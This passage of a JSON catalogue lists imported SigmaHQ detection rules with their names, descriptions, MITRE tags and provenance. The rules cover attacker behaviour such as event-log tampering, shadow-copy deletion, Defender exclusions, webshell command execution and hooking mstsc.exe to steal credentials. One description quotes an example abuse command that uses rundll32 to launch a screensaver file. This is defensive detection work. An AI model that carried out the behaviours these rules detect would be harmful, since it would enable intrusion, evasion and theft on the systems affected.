"Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpevtmute-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml" } }, { "id": "sigmahq-sigma-bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "type": "detection", "name": "Python Initiated Connection", "description": "Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-initiated-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_python.yml" } }, { "id": "sigmahq-sigma-bef37fa2-f205-4a7b-b484-0759bfd5f86f", "type": "detection", "name": "PUA - Advanced IP Scanner Execution", "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-ip-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" } }, { "id": "sigmahq-sigma-bf241472-f014-4f01-a869-96f99330ca8c", "type": "detection", "name": "Disk Image Mounting Via Hdiutil - MacOS", "description": "Detects the execution of the hdiutil utility in order to mount disk images.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disk-image-mounting-via-hdiutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf241472-f014-4f01-a869-96f99330ca8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" } }, { "id": "sigmahq-sigma-bf344fea-d947-4ef4-9192-34d008315d3a", "type": "detection", "name": "Suspicious Shim Database Patching Activity", "description": "Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shim-database-patching-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf344fea-d947-4ef4-9192-34d008315d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml" } }, { "id": "sigmahq-sigma-bf361876-6620-407a-812f-bfe11e51e924", "type": "detection", "name": "Compressed File Extraction Via Tar.EXE", "description": "Detects execution of \"tar.exe\" in order to extract compressed file.\nAdversaries may abuse various utilities in order to decompress data to avoid detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compressed-file-extraction-via-tar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf361876-6620-407a-812f-bfe11e51e924", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tar_extraction.yml" } }, { "id": "sigmahq-sigma-bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "type": "detection", "name": "ETW Logging Disabled In .NET Processes - Sysmon Registry", "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-in-net-processes-sysmon-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" } }, { "id": "sigmahq-sigma-bf638ef7-4d2d-44bb-a1dc-a238252e6267", "type": "detection", "name": "Google Workspace Role Privilege Deleted", "description": "Detects when an a role privilege is deleted in Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-role-privilege-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_role_privilege_deleted.yml" } }, { "id": "sigmahq-sigma-bf72941a-cba0-41ea-b18c-9aca3925690d", "type": "detection", "name": "PowerShell ADRecon Execution", "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-adrecon-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" } }, { "id": "sigmahq-sigma-bf74135c-18e8-4a72-a926-0e4f47888c19", "type": "detection", "name": "DNS Events Related To Mining Pools", "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002", "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-events-related-to-mining-pools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf74135c-18e8-4a72-a926-0e4f47888c19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_mining_pools.yml" } }, { "id": "sigmahq-sigma-bf9808c4-d24f-44a2-8398-b65227d406b6", "type": "detection", "name": "Potential Libvlc.DLL Sideloading", "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-libvlc-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_libvlc.yml" } }, { "id": "sigmahq-sigma-bf9e1387-b040-4393-9851-1598f8ecfae9", "type": "detection", "name": "Disable Exploit Guard Network Protection on Windows Defender", "description": "Detects disabling Windows Defender Exploit Guard Network Protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-exploit-guard-network-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bf9e1387-b040-4393-9851-1598f8ecfae9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" } }, { "id": "sigmahq-sigma-bfbd3291-de87-4b7c-88a2-d6a5deb28668", "type": "detection", "name": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adcs-certificate-template-configuration-vulnerability-with-risky-eku.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" } }, { "id": "sigmahq-sigma-c0239255-822c-4630-b7f1-35362bcb8f44", "type": "detection", "name": "Triple Cross eBPF Rootkit Default LockFile", "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-default-lockfile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0239255-822c-4630-b7f1-35362bcb8f44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" } }, { "id": "sigmahq-sigma-c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "type": "detection", "name": "New Service Creation Using PowerShell", "description": "Detects the creation of a new service using powershell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-service-creation-using-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_create_service.yml" } }, { "id": "sigmahq-sigma-c048f047-7e2a-4888-b302-55f509d4a91d", "type": "detection", "name": "SCR File Write Event", "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scr-file-write-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c048f047-7e2a-4888-b302-55f509d4a91d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_new_scr_file.yml" } }, { "id": "sigmahq-sigma-c0514f28-fdae-42df-b886-06e2b2bc5b37", "type": "detection", "name": "Service Startup Type Change Via Wmic.EXE", "description": "Detects changes to service startup type to 'disabled' or 'manual' using the WMIC command-line utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startup-type-change-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0514f28-fdae-42df-b886-06e2b2bc5b37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_service_startup_change.yml" } }, { "id": "sigmahq-sigma-c082c2b0-525b-4dbc-9a26-a57dc4692074", "type": "detection", "name": "DNS Query by Finger Utility", "description": "Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\nIn one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\nSince the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\nInvestigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-by-finger-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c082c2b0-525b-4dbc-9a26-a57dc4692074", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_finger.yml" } }, { "id": "sigmahq-sigma-c09dad97-1c78-4f71-b127-7edb2b8e491a", "type": "detection", "name": "Execution of Suspicious File Type Extension", "description": "Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.\nThis rule might require some initial baselining to align with some third party tooling in the user environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-suspicious-file-type-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" } }, { "id": "sigmahq-sigma-c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "type": "detection", "name": "Remote Thread Creation In Mstsc.Exe From Suspicious Location", "description": "Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\nThis technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-in-mstsc-exe-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml" } }, { "id": "sigmahq-sigma-c0b2768a-dd06-4671-8339-b16ca8d1f27f", "type": "detection", "name": "Potentially Suspicious NTFS Symlink Behavior Modification", "description": "Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-ntfs-symlink-behavior-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" } }, { "id": "sigmahq-sigma-c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "type": "detection", "name": "Suspicious AgentExecutor PowerShell Execution", "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-agentexecutor-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" } }, { "id": "sigmahq-sigma-c0d3734d-330f-4a03-aae2-65dacc6a8222", "type": "detection", "name": "Webshell Remote Command Execution", "description": "Detects possible command execution by web application/web shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_web_rce.yml" } }, { "id": "sigmahq-sigma-c0e0bdec-3e3d-47aa-9974-05539c999c89", "type": "detection", "name": "Registry Modification for OCI DLL Redirection", "description": "Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.\nThreat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-for-oci-dll-redirection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0e0bdec-3e3d-47aa-9974-05539c999c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_potential_oci_dll_redirection.yml" } }, { "id": "sigmahq-sigma-c1182e02-49a3-481c-b3de-0fadc4091488", "type": "detection", "name": "Rare Subscription-level Operations In Azure", "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rare-subscription-level-operations-in-azure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1182e02-49a3-481c-b3de-0fadc4091488", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_rare_operations.yml" } }, { "id": "sigmahq-sigma-c11aecef-9c37-45a6-9c07-bc0782f963fd", "type": "detection", "name": "RunMRU Registry Key Deletion", "description": "Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.\nIn the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\nAdversaries may delete this key to cover their tracks after executing commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/runmru-registry-key-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c11aecef-9c37-45a6-9c07-bc0782f963fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_runmru.yml" } }, { "id": "sigmahq-sigma-c1337eb8-921a-4b59-855b-4ba188ddcc42", "type": "detection", "name": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deletion-of-volume-shadow-copies-via-wmi-with-powershell-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" } }, { "id": "sigmahq-sigma-c1344fa2-323b-4d2e-9176-84b4d4821c88", "type": "detection", "name": "Windows Defender Exclusions Added - PowerShell", "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusions-added-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" } }, { "id": "sigmahq-sigma-c15a46a0-07d4-4c87-b4b6-89207835a83b", "type": "detection", "name": "Add Potential Suspicious New Download Source To Winget", "description": "Detects usage of winget to add new potentially suspicious download sources", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-potential-suspicious-new-download-source-to-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" } }, { "id": "sigmahq-sigma-c15e99a3-c474-48ab-b9a7-84549a7a9d16", "type": "detection", "name": "Remote Thread Creation Ttdinject.exe Proxy", "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-ttdinject-exe-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" } }, { "id": "sigmahq-sigma-c172b7b5-f3a1-4af2-90b7-822c63df86cb", "type": "detection", "name": "Mask System Power Settings Via Systemctl", "description": "Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.\nAdversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.\nThis behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid 